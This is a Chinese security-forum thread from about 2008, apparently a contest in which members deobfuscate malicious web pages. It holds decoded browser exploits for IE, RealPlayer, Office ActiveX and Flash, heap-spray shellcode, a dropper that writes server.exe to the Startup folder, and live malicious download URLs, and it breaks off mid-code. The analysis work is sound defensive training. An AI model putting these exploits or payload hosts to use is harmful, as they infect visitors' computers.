[解密悬赏][第9期][结束]

qianwenxiang

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到对应网址的25%经验
3、最好有解密软件日志，如果没有，请发出具体解密过程
4、当第一个人成功完全解密后，将根据难度给予其相应经验，所有URL全部解完之后本帖将锁定
5、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
6、锁定后，会重新修改本次的解密地址，并且开帖！



解密地址（替换HXXP为HTTP）：

hXXp://www.52cps.com/goto/ (完成)
一次解完（包含解密步骤）=14分 (所有iframe均解出exe地址)
分步（即未解完情况）=每步3分 (解出部分iframe或exe地址)

(共计3个步骤/完成 by knifed @ 3L ; vistabull @ 5L)

hXXp://www.narkomat.ru/ (完成)
一次解完（包含解密步骤）=41分
分步（即未解完情况）=每步5分
(共计8个步骤/完成 by SONGBOWEN @ 10L)

有效性：
> 代码: 读取代码:www.narkomat.ru/
= 长度:4602成功
> 代码: 读取代码:www.52cps.com/goto
= 长度:1207成功

注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.5（中文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://www.jimmyleo.com/share/FreShow!.rar（推荐！不会用FreShow的可以看看）


(时限=1天)(至2008.01.08 19:00止)

WWL363112122

看来自己还是没资格参加
先去看看教程吧

knifed

Log is generated by FreShow.
[wide]http://www.52cps.com/goto/
    [frame]http://www.52cps.com/goto/14.htm
        [object]http://www.52cps.com/server.exe
    [frame]http://www.52cps.com/goto/xx.htm
        [object]http://www.52cps.com/server.exe
    [frame]http://www.52cps.com/goto/flash.htm
        [frame]http://www.52cps.com/goto/ihh.html
            [object]http://www.52cps.com/goto/i16.swf
            [object]http://www.52cps.com/goto/i28.sw
            [object]http://www.52cps.com/goto/i45.sw
            [object]http://www.52cps.com/goto/i64.sw
            [object]http://www.52cps.com/goto/i115.swf
        [frame]http://www.52cps.com/goto/fhh.html
            [object]http://www.52cps.com/goto/f45.swF
            [object]http://www.52cps.com/goto/f47.sw
                [object]http://www.52cps.com/goto/f16.swf
                [object]http://www.52cps.com/goto/f28.swf
            [object]http://www.52cps.com/goto/f64.swf
            [object]http://www.52cps.com/goto/f115.sw
    [frame]http://www.52cps.com/goto/ie7.htm
        [object]http://www.52cps.com/server.exe
    [frame]http://www.52cps.com/goto/lz.htm
        [object]http://www.52cps.com/server.exe
    [frame]http://www.52cps.com/goto/office.htm
    [frame]http://www.52cps.com/goto/real.htm
    [frame]http://www.52cps.com/goto/real.html

knifed

后三个不会解了.

XMatence

我不能参加，不过你都发了

看看手工解密


关于:hxxp://www.52cps.com/goto/解密的日志(自动模式 -  13):

AUTO>http://www.52cps.com/goto/
AUTO>http://www.52cps.com/goto/14.htm

http://www.52cps.com/server.exe

AUTO>http://www.52cps.com/goto/xx.htm

<HTML><HEAD>
<META content=DLWIXOQLDS name=SKYPE_FRAMEID>
<META content=DLWIXOQLDS name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=target classid=clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2></OBJECT>
<SCRIPT language=javascript>
window.onerror=function(){return true;}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1v="1u";5 6=g("%a%a%1t%1s%1w%1x%1A%1z%1y%1r%1q%1j%1i%1h%1g%2%p%1k%o%1l%o%1o%1n%1m%p%1B%1C%1S%1R%1Q%2%9%1P%1T%1U%1X%1W%2%9%1V%1O%1N%1G%1F%2%9%m%1E%1D%1H%1I%2%9%1M%1L%1K%1f%1Y%2%9%N%M%L%K%O%P%S%R%Q%J%C%h%c%f%B%A%2%z%D%E%H%2%G%F%T%U%18%16%19%2%1a%r%1d%1c%n%l%1b%2%q%15%14%Y%X%W%V%2%t%j%10%h%c%f%13%2%k%12%q%11%Z%I%1J%2Q%r%1Z%2V%n%l%2Y%2%2Z%t%j%31%30%c%f%2U%2%k%2T%2N%h%c%f%2K%2%2P%2S%b%b%b%b%2R%34%33%3e%3j%3i%3h%3g%3l%3m%m%3n%3k%3f%38%37%36%35%39%3a%3d%3c%3b%2J%2I%2g%2f%2e%2d%2h%2i%2l%2k%2j%2c%2b%24%23%22%21%25%26%2a%29%28%27%2m%2n%2C%2B%2A%2z%2D");s=g("%2E%2H%2G%2F%2y%2x%2r%2q%2p%2o%2s%2t%2w%2v%2u%2W");6=6+s;5 3=g("%a%a");5 u=20;5 8=u+6.7;i(3.7<8)3+=3;y=3.w(0,8);4=3.w(0,3.7-8);i(4.7+8<1e)4=4+4+y;v=1p 32();2X(x=0;x<2O;x++)v[x]=4+6;5 e=\'\';i(e.7<2L)e+="\\d\\d\\d\\d";2M.17(e,1,1,1);',62,210,'||uefef|bigblock|block|var|shellcode|length|slackspace|uaa66|u9090|u0eec|u64b6|x0a|buffer|uf7ba|unescape|uee85|while|u64cf|u85ef|u07f7|ub9e3|uba64|u9f64|u64ef|uaaec|uaa64|home|u9a10|headersize|memory|substring||fillblock|u87bf|uef64|u07b9|uebaa|uf5d9|u9fc0|uf3aa|u66ef|u7807|u10bc|u64cb|u6615|u9a2c|ud76f|uaffb|uf7aa|ue806|u9a66|ub1ef|uefee|u2a64|u2f6c|u8a97|uebaf|u288a|uc191|ubc34|ue3aa|udccb|ub7e8|uaf07|ub3ef|u28cf|ucfaa|LoadPage|u66bf|u1087|ubfef|uef8e|ub6ed|u85fb|0x40000|u0757|udf4e|u8b7f|uffff|uffec|ue3af|u42f3|uefeb|uef03|u6ee7|new|ue805|uebfa|u335b|u0feb|sameee|sjsj|u66c9|u80b9|ue243|uef33|u8001|ub903|u6187|u0f21|u0087|uef0d|u072d|u078f|uef3b|ucf9a|u0a96|u2e87|ub9ff|u105f|uca87|ub9eb|uef11|u0703|ue1a1|u7787|u6511|ub9e7|uef1f|u07e1|uef29|u85f3||u64a4|ue364|u8932|ueccb|uf3b5|u32ec|u2db2|ub12a|uec64|ueb64|ub564|u0464|uece2|u212e|ue79b|u1dd5|uaf1d|u1e04|ub50a|u9ab1|u11d4|uefe7|u1b07|u6d6f|u632e|u7370|u6332|u732f|u7265|u7865|u2e72|u6576|u352e|u7777|ua0a2|ua3bd|uba10|u1011|uefa1|u7468|u772f|u2f3a|u7074|uff51|ue019|uef07|3092|target|uffaa|300|uaeef|ubcbf|u036c|ubdb4|u6410|uff07|ub6ea|u0065|for|uefcc|uef85|ued85|ue7aa|Array|u64bc|ub5eb|ueccf|u9964|ub91c|uec97|udc1c|ua626|udcb9|u2cec|u42ae|u0d35|uf19b|u6403|u64ba|u0f10|ubd18|u64d3|ue792|ub264|u9c64'.split('|'),0,{}))

</SCRIPT>
</BODY></HTML>

AUTO>http://www.52cps.com/goto/flash.htm

goto  ihh.htm fhh.htm  (后面有了)

AUTO>http://www.52cps.com/goto/ie7.htm

sadd="hhgg";var shellcode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u772f%u7777%u352e%u6332%u7370%u632e%u6d6f%u732f%u7265%u6576%u2e72%u7865%u0065");var spray=unescape("%u0a0a%u0a0a");do{spray+=spray}while(spray.length<0xd0000);memory=new Array();for(i=0;i<100;i++)memory=spray+shellcode;xmlcode="<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.baidu.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";tag=document.getElementById("sameddf");tag.innerHTML=xmlcode;


AUTO>http://www.52cps.com/goto/lz.htm

<HTML><HEAD>
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>

<META content=IPOIEFCGXL name=SKYPE_FRAMEID>
<META content=IPOIEFCGXL name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=target classid=clsid:F917534D-535B-416B-8E8F-0C04756C31A8></OBJECT>
<SCRIPT>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1d="1c"9 r=h("%1b%1e%1f%1h%1g%1a%w%19%13%12%11%14%w%15%k%18%17%16%1i%1j%1w%1v%1u%1x%1y%1A%1z%1t%1s%1m%1l%10%k%1n%1o%1r%1q%1p%1B%P%F%D%K%z%y%C%B%A%J%l%Z%V%U%l%X%m%o%p%Y%T%m%o%p%s%Q%e%W%R%O%M%N%S%t%L%I%e%H%G%E%1k%2a%2n%2m%n%b%2l%2o%2p%t%e%b%2r%2q%2k%s%2j%1C%2d%b%2c%2f%2g%2i%n%2h%2t%3%2H%2E%2J%2F%2G%7%2I%3%2D%2C%2w%2v%2u%2x%2y%2B%2A%7%2z%3%j%i%7%2s%3%j%i%7%2b%3%1O%1N%1M%1P%1Q%1S%1R%1L%1K%1F%1E%1D%1G%1H%1J%1I");9 1=h("%u"+"c"+"c"+"%1T"+"c");a(1.6<8){1+=1}f=1.g(0,8);2=1.g(0,1.6-8);a(2.6+8<1U){2=2+2+f}v=25 24();26(x=0;x<27;x++){v[x]=2+r}9 5=\'\';a(5.6<29){5+=\'\\4\\4\\4\\4\'}28["\\23\\22\\1X\\d\\q\\1W\\d\\1V\\q\\d\\1Y\\1Z\\21"](5,"20","2e");',62,170,'|nop|vcbcv|uffff|x0a|hellohack|length|ue800|224|var|while|u53d0|90|x74|uff52|fillvcbcv|substring|unescape|u765c|u2e2e|ueb01|u5b8b|u8e68|uff00|u0e4e|uffec|x61|shellcode|uebd6|u5ad6||arrayd|u8b18||u08c2|u5b5d|u6459|u306a|u5e00|uc031|u5beb|u02eb|u5a72|uebd0|u5159|u198b|u5e5f|u4deb|uaa68|u0dfc|u5352|ue801|u5a50|u52c2|uff7c|u53c7|u1b8b|u1c5b|u89d0|u5308|u89d6|u8b0c|u245a|uea01|u7805|u548b|u4a8b|u205a|u8b34|u8b49|u32e3|u3c45|u246c|u56e8|fdsg|tsetand|u0000|u5300|u8b57|u5655|uee01|uff31|u6a59|u8be1|u7514|u8b66|u4b0c|u8beb|u011c|u5a8b|u247c|u3bf2|ue038|uacc0|u31fc|u0774|ucfc1|uebc7|u010d|u8b04|u006a|u7265|u732f|u6d6f|u6576|u2e72|u0065|u7865|u632e|u7370|u2f3a|u7074|u7468|u772f|u7777|u6332|u352e|u90|0x40000|x4e|x72|x53|x69|x76|aaabbbbcccdd|x65|x45|x49|Array|new|for|300|target|600|u6a00|uff89|u7e68|uff51|lllllll|ue2d8|uff73|ue8d0|u6ad6|u5944|uff0e|ua068|u6a52|u5100|uc9d5|uff4d|u8afe|u9868|uffb7|uffab|u616f|u6c6e|u776f|u5464|u466f|uffa0|u4165|u6c69|u444c|u5255|u6d6c|u642e|u6c6c|u7275|uffae|u6e6f'.split('|')))

</SCRIPT>
</BODY></HTML>

AUTO>http://www.52cps.com/goto/office.htm

<HTML><HEAD>
<META content=AAQYQFHQHM name=SKYPE_FRAMEID>
<META content=AAQYQFHQHM name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=obj classid=clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9 SnapshotPath="http://www.52cps.com/server.exe" CompressedPath="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe"></OBJECT>
<SCRIPT language=javascript>
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('12="9";1 2=\'11://8.7.5/6.3\';1 4=\'10:/21 19 13/18 17/「开始」菜单/程序/启动/14.3\';0.15=2;0.16=4;0.20(); ',10,22,'obj|var|buf1|exe|buf2|com|server|52cps|www|mmma|C|http|ddf|Settings|Thunder|SnapshotPath|CompressedPath|Users|All|and|PrintSnapshot|Documents'.split('|')))

</SCRIPT>
</BODY></HTML>

用迅雷下载：

http://www.52cps.com/server.exe

AUTO>http://www.52cps.com/goto/real.htm

<HTML><HEAD>
<SCRIPT language=JavaScript>
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('118="116";23 20=["%75"+"%102"+"%74"+"%59","%131"+"%134"+"%60","%133"+"%71"+"%99"+"%60","%63"+"%11"+"%69"+"%60","%63"+"%11"+"%59"+"%60","%79"+"%31"+"%94"+"%60","%79"+"%31"+"%84"+"%60","%51"+"%11"+"%70"+"%63"];83 55(){23 29=36.85["34"]();16(29.21("54 6")==-1&&29.21("54 7")==-1)26;16(29.21("86 5.")==-1)26;23 48;33="87"+"82.81"+"76"+"73.1";48=33;77{37=78 80["88"](33["89"](/97/98,""))}72(100){26}45="96";44="95";91="90";57="6.0.14.92";42=45+44;17=37["93"](42);13="";28=22(20[0]);25(15=0;15<32*101;15++)13+="62";16(17.21("6.0.14.")==-1){16(36.46.34()=="65-68")18=22(20[1]);19 16(36.46.34()=="67-66")18=22(20[2]);19 26}19 16(17==57)18=22(20[3]);19 16(17=="6.0.14.61")18=22(20[4]);19 16(17=="6.0.14.64")18=22(20[5]);19 16(17=="6.0.14.125")18=22(20[6]);19 16(17=="6.0.14.132")18=22(20[7]);19 26;16(17.21("6.0.10.")!=-1){25(15=0;15<4;15++)13=13+28;13=13+18}19 16(17.21("6.0.11.")!=-1){25(15=0;15<6;15++)13=13+28;13=13+18}19 16(17.21("6.0.12.")!=-1){25(15=0;15<9;15++)13=13+28;13=13+18}19 16(17.21("6.0.14.")!=-1){25(15=0;15<10;15++)13=13+28;13=13+18}23 43,58="130 127";47="136\\\\129";43=58;8="";8=8+"135";8=8+"140";8=8+"142";8=8+"143";8=8+"144";8=8+"137";8=8+"138";8=8+"139";8=8+"141";8=8+"128";8=8+"126";8=8+"109";8=8+"110";8=8+"111";8=8+"112";108="";30=13+47+8;49=107;103(30.104<49)30+="105";23 52=["35:\\\\40 41\\\\39\\\\..\\\\..\\\\24\\\\50\\\\106.27","35:\\\\40 41\\\\39\\\\113.27","38:\\\\24\\\\56\\\\114.27","38:\\\\24\\\\121.122","35:\\\\40 41\\\\39\\\\..\\\\..\\\\24\\\\50\\\\123.27","38:\\\\24\\\\56\\\\124.27"];37["120"](52[53.119(53["115"]()*6)],30,"117",0,0)}55();',10,145,'||||||||ShellCode|||||sdfdgdfg||i|if|RealVersion|ret|else|addr|indexOf|unescape|var|WINDOWS|for|return|wav|cvbcbb|user|xcbfcxn|||RealplayerObj|toLowerCase|c|navigator|Gamttt_Anhey_Real_Exp_Send|C|NetMeeting|Program|Files|CuteRealVersions|Ball|CuteRealVersion2|CuteRealVersion|userLanguage|qwfgsg|Gamttt|temp|Media||arr1|Math|msie|Gameee_Timeeeeeee_Saveeeeeeee_Logeeee_ssssssssssssssssss|system32|dddd|Qqs|04||550|S||552|zh|us|en|cn|08|||catch|Caaataaal|||EaaaRaaaP|try|new||window|I|PaaaCaaataaal|function|09|userAgent|nt|IaaaEaaaR|ActiveXObject|replace|chilam|CuteRealVersion3s|544|PlayerProperty|01|VERSION|PRODUCT|a|g|a4|error|148|06|while|length|lizhen|chimes|0x8000|C2|PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN|eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw|2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW|qvRHptd4RPFZVOdoRWQgrWTnTu5b2CRP3CTne3popm4orSqu1bQfSUQbVNQuqh1uopuP|TestSnd|BuzzingBee|random|rttt|123456456|dfdf|floor|import|clock|avi|tada|LoopyMusic|543|gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5|AntiVirus|OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL|XXXXXLD|Fucking|7f|536|4f|a5|TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI|LLLL|runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX|HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK|e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI|xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv|5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ|3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB|sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO|NuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMw'.split('|')))
</SCRIPT>

<META content=LNBOFXCKHK name=SKYPE_FRAMEID>
<META content=LNBOFXCKHK name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY></BODY></HTML>

AUTO>http://www.52cps.com/goto/real.html

<HTML><HEAD>
<META content=LKVRKAPTUY name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY></BODY></HTML>

？？


AUTO>http://www.52cps.com/goto/ihh.html

<HTML><HEAD>
<SCRIPT language=JavaScript>
window.status="完成";
</SCRIPT>

<SCRIPT src="swfobject.js" type=text/javascript></SCRIPT>

<META content=KHUPBCSIOJ name=SKYPE_FRAMEID>
<META content=KHUPBCSIOJ name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
tsetand ="mymovie"
var versionn=deconcept.SWFObjectUtil.getPlayerVersion();
if(versionn['major']==9){document.getElementById('flashversion').innerHTML="";if(versionn['rev']==115){var so=new SWFObject("i115.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']==64){var so=new SWFObject("i64.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']==47){var so=new SWFObject("i47.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']==45){var so=new SWFObject("i45.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']==28){var so=new SWFObject("i28.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']==16){var so=new SWFObject("i16.swf",tsetand,"0.1","0.1","9","#000000");so.write("flashcontent")}else if(versionn['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
</SCRIPT>
</BODY></HTML>

得 i115.swf  i64.swf  i47.swf i45.swf i28.swf i16.swf


AUTO>http://www.52cps.com/goto/fhh.html

同上？


AUTO>http://www.52cps.com/goto/swfobject.js

这个没问题


AUTO>http://www.52cps.com/goto/+

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li> 转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li>
<li>打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

完

qianwenxiang

开始准备去掉第二条规则的 不过复制的时候忘了删鸟..

250662772

网速真不行，不解了，


[ 本帖最后由 250662772 于 2009-1-7 20:07 编辑 ]

XMatence

感觉手动解密比自动解密好多鸟～～

顺便说一遍 Redoce 现在不是1.6么？还有hXXp Redoce 不支持 hxxp 支持

还有赶紧删掉那一条，否则我早就发上来了

qianwenxiang

hXXp的问题在1.7修正吧~
第二条删掉了

SONGBOWEN

第二个网马hXXp://www.narkomat.ru/，下载地址有两个，分别是
http://north-host.net//css/i/load.php?id=887&spl=5
和
http://north-host.net//css/i/load.php?id=887&spl=4

分析工具：Malzilla
打开Malzilla，URL填http://www.narkomat.ru/，Get，然后看Links Parser中的IFrames，发现了

1. iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"

复制代码

URL填http://diettopseek.cn/in.cgi?cocacola，Get，提示

Redirection to http://north-host.net/css/i/index.php detected.
Follow redirection?

选 Yes，允许重定向，得到如下代码：

1. <html><body><object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object><div id='pdfplace'></div><div id='xmlplace'></div><script>function onerrorpage(){return true;}</script><style>.AkE37LghRyBkB{display:none;}</style><div class="AkE37LghRyBkB"id="sfd">1e2v345a6l</div><script>window.onerror=onerrorpage();</script><b class="AkE37LghRyBkB"id="AkE37LghRyBkB"> 10.102.117.110.99.116.105.111.110.32.115.108.101.101.112.40.省略N多内容.省略N多内容.省略N多内容.省略N多内容.10.125.10.10.97.116.116.97.99.107.40.49.41.59.10</b><script>var g=document.getElementById('sfd').innerHTML.replace(/[\+123456]/g,"");var extJS=eval(g);var s=document.getElementById("AkE37LghRyBkB").innerHTML;s=s.replace(/[A-Za-z]/g,function (c){returnString.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split(".");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s);}extJS(p);</script></body></html>

复制代码

然后手动把document.getElementById('sfd').innerHTML替换为'1e2v345a6l'，把document.getElementById("AkE37LghRyBkB").innerHTML替换为那个超长的数字串。
接下来，复制从最后一个“<script>”标记开始，到“</script>”之间的全部代码到Decoder页面，按照默认设置Run Script，得到两条eval()结果。
先看第一条，只有一个eval，不是我们需要的内容，看第二条：

1. 
   
2. function sleep(func,naptime){
   
3. var sleeping = true;
   
4. var now = new Date();
   
5. var alarm;
   
6. var startingMSeconds = now.getTime();
   
7. while(sleeping){
   
8. alarm = new Date();
   
9. alarmMSeconds = alarm.getTime();
   
10. if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
    
11. }
    
12. eval(func);
    
13. }
    
14. var m=new Array();
    
15. var mf=0;
    
16. var url="http://north-host.net//css/i/load.php?id=887";
    
17. function hex(num,width){
    
18. var digits="0123456789ABCDEF";
    
19. var hex=digits.substr(num&0xF,1);
    
20. while(num>0xF){
    
21. num=num>>>4;
    
22. hex=digits.substr(num&0xF,1)+hex;
    
23. }
    
24. var width=(width?width:0);
    
25. while(hex.length<width)hex="0"+hex;
    
26. return hex;
    
27. }
    
28. function addr(addr){
    
29. return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
    
30. }
    
31. function unes(str){
    
32. var tmp="";
    
33. for(var i=0;i<str.length;i+=4){
    
34. tmp+=addr((str.charCodeAt(i+3)<<24)+
    
35. (str.charCodeAt(i+2)<<16)+
    
36. (str.charCodeAt(i+1)<<8)+
    
37. str.charCodeAt(i));
    
38. }
    
39. return unescape(tmp);
    
40. }
    
41. function hav(){
    
42. mf=mf;
    
43. setTimeout("hav()",1000);
    
44. }
    
45. function gss(ss,sss){
    
46. while(ss.length*2<sss)ss+=ss;
    
47. ss=ss.substring(0,sss/2);
    
48. return ss;
    
49. }
    
50. function ms(xpl){
    
51. var plc=unes(
    
52. "\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B"+
    
53. "\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A\x44\x5A"+
    
54. "\xD1\xE2\x2B\xE2\x8B\xEC\xEB\x4F\x5A\x52\x83\xEA\x56\x89\x55\x04"+
    
55. "\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78\x03\xF3\x56\x8B\x76\x20\x03"+
    
56. "\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF\x36\x0F\xBE\x14\x03\x38\xF2"+
    
57. "\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB\xEF\x58\x3B\xF8\x75\xE5\x5E"+
    
58. "\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48\x8B\x56\x1C\x03\xD3\x8B\x04"+
    
59. "\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D\x08\x57\x52\xB8\x33\xCA\x8A"+
    
60. "\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B\xF7\xF2\xAE\x4F\xB8\x65\x2E"+
    
61. "\x65\x78\xAB\x66\x98\x66\xAB\xB0\x6C\x8A\xE0\x98\x50\x68\x6F\x6E"+
    
62. "\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E\x4E\x0E\xEC\xFF\x55\x04"+
    
63. "\x93\x50\x33\xC0\x50\x50\x56\x8B\x55\x04\x83\xC2\x7F\x83\xC2\x31"+
    
64. "\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x04\x5B\x33\xFF\x57\x56\xB8"+
    
65. "\x98\xFE\x8A\x0E\xFF\x55\x04\x57\xB8\xEF\xCE\xE0\x60\xFF\x55\x04"+url+xpl);
    
66. var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
    
67. var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
    
68. if (mf){
    
69. for (i=0;i<hb;i++)delete m[i];
    
70. CollectGarbage();
    
71. }
    
72. for(i=0;i<hb;i++)m[i]=ss+plc;
    
73. if(!mf){
    
74. mf=1;
    
75. hav();
    
76. }
    
77. return 0;
    
78. }
    
79. function cobj(obj){
    
80. var ret=null;
    
81. if(obj.substring(0,1)=="{"){
    
82. try{
    
83. var clsid=obj.substring(1,obj.length-1);
    
84. ret=document.createElement("object");
    
85. ret.setAttribute("classid","clsid:"+clsid);
    
86. return ret;
    
87. }catch(e){
    
88. return null;
    
89. }
    
90. }else{
    
91. try{
    
92. ret=new ActiveXObject(obj);
    
93. return ret;
    
94. }catch(e){
    
95. return null;
    
96. }
    
97. }
    
98. }
    
99. var padding = "AAAA";
    
100. var heapBase = 0x00150000;
     
101. var memo;
     
102. function init(maxAlloc){
     
103. while (4 + padding.length*2 + 2 < 65535)padding += padding;
     
104. memo = new Array();
     
105. flush();
     
106. }
     
107. function flush(){
     
108. delete memo["plunger"];
     
109. CollectGarbage();
     
110. memo["plunger"] = new Array();
     
111. var bytes = new Array(32, 64, 256, 32768);
     
112. for (var i = 0; i < 6; i++) {
     
113. for(var n = 0; n < 4; n++) {
     
